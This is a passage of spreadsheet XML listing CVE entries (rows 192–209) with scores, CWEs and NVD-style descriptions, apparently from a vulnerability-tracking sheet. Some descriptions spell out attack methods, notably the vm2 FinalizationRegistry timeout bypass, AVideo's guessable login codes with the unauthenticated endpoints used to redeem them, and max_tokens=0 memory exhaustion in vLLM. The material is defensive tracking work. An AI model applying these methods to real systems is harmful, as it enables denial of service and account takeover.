          <t>vm2 before 3.11.7 (affected versions &lt;= 3.11.6) does not enforce the VM({ timeout }) option on code executed outside the synchronous VM#run() call. The timeout only wraps the single call to _runScript() via doWithTimeout() in lib/vm.js, and FinalizationRegistry and WeakRef are exposed to sandboxed code unmodified (they are not among the hardened globals in lib/setup-sandbox.js). Sandboxed code can register a FinalizationRegistry cleanup callback against an object and then drop the only strong reference to it; vm.run() returns within the configured timeout, but when the V8 garbage collector later reclaims the object it invokes the sandboxed cleanup callback outside any vm2 timeout accounting. A busy loop in that callback blocks the host event loop for an unbounded period, resulting in denial of service. The time of invocation depends on the garbage collector (e.g. under memory pressure or with --expose-gc).</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92942</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92961</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.6 fails to enforce bufferAllocLimit on ArrayBuffer, SharedArrayBuffer, and TypedArray constructors, allowing attackers to allocate arbitrary host memory. Attackers can bypass the buffer allocation cap by using these V8 intrinsics to exhaust host process memory and trigger out-of-memory conditions.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92961</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92983</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>InternLM LMDeploy through 0.17.0 in DistServe prefill/decode disaggregation mode fails to release scheduler sessions because the proxy uses user-facing session IDs instead of internal scheduler keys. Unauthenticated attackers can send completion requests to the proxy endpoint that accumulate unreleased scheduler metadata and memory until the prefill worker is out-of-memory killed.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92983</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93435</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>redis-parser through 3.0.0 contains a denial of service vulnerability in the RESP protocol parser that allows malicious Redis endpoints to crash the client process through unbounded recursion on nested arrays. Attackers can send crafted RESP byte streams with repeated array headers that exhaust the V8 call stack, causing an uncaught RangeError that terminates the Node.js process without triggering error handling callbacks.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93435</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93436</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>vLLM through 0.29.0 fails to properly clean up decode-side metadata for rejected inference requests in prefill/decode disaggregated deployments. Remote attackers can submit requests with max_tokens=0 to exhaust decode-worker memory without bound until the worker restarts.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93436</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24081</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>Transient DOS when processing a channel map with insufficient used channels and adaptive frequency hopping is fully enabled.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24081</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25281</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>Transient DOS when processing large or numerous request buffers without sufficient memory allocation validation.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25281</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25294</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>Transient DOS while parsing frame during channel usage.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25294</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50605</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer Agent Service component included with NitroSense and PredatorSense. Insufficient access controls within a privileged service may allow an authenticated local user to perform unauthorized registry operations. In certain situations, this could lead to privilege escalation or compromise of the affected system.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50605</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50609</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer System Monitoring component included with NitroSense and PredatorSense. Insufficient access controls within a privileged Named Pipe service may allow an authenticated local user to perform unauthorized registry operations. In certain situations, this could lead to privilege escalation or compromise of the affected system.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50609</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50610</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer System Monitoring component included with NitroSense and PredatorSense due to insufficient access controls in a privileged service. An authenticated local user may be able to access the service and perform unauthorized registry modifications, potentially resulting in local privilege escalation.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50610</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78501</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-923</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft 365 Copilot's Business Chat allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78501</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81446</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Server-Side Request Forgery (SSRF) vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Server-side request forgery.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81446</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86688</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>Session Fixation vulnerability in team-alembic ash_authentication allows an attacker who can plant a session identifier in a victim's browser to hold an authenticated session once that victim signs in.
AshAuthentication.Plug.Helpers.store_in_session/2 writes the authenticated subject into the existing session with Plug.Conn.put_session/3 and never calls Plug.Conn.configure_session(renew: true), so the identifier the visitor arrived with carries into their authenticated session. Every authentication event reaches this one function: the default success/4 injected by AshAuthentication.Phoenix.Controller.__using__/1, the AuthController emitted by mix ash_authentication_phoenix.install, and remember-me auto-login. AshAuthentication.Phoenix.Plug.store_in_session/2 is a defdelegate to it. Logout does not close the window either, because clear_session/2 ends with Plug.Conn.clear_session/1, which clears session contents but leaves the identifier intact, so a planted identifier survives a logout-then-login cycle.
This issue affects ash_authentication: from 0.2.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86688</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90997</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>mysql, keycloak</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Keycloak. When deployed in stateless mode with MySQL or MariaDB, a mismatch in row-count semantics between the database driver and Keycloak's application logic allows an attacker to bypass replay protection. This vulnerability enables an attacker who intercepts single-use security artifacts, such as JWT client assertions, DPoP proofs, or one-time password (TOTP) codes, to replay them. Successful exploitation grants unauthorized access to the token endpoint or login flow.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90997</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92913</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>7.4</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2026-09-17</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 uses a cryptographically weak pseudo-random number generator when creating account activation / login pairing codes. getRandomCode() in objects/functions.php derives the code entirely from uniqid() (sprintf('%08x%05x', seconds, microseconds)) with a single non-CSPRNG rand() character used only as padding, reducing the code space to roughly 36 x 10^6 (~2^25) values for a known generation second. Because plugin/API/set.json.php?APIName=login_code can be called without authentication, it also serves as an oracle for the server's exact microtime. An unauthenticated remote attacker who guesses a valid, unexpired code (codes expire after 10 minutes) can redeem it at plugin/API/get.json.php?APIName=login_code to obtain the target account's email address and a User::getUserHash(users_id, '+1 year') value, a credential accepted in place of the account password for one year, resulting in account takeover. No patched version is available.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92913</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25284</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>Information Disclosure when a pointer is reused after being deallocated.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25284</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53554</t>
        </is>
      </c>
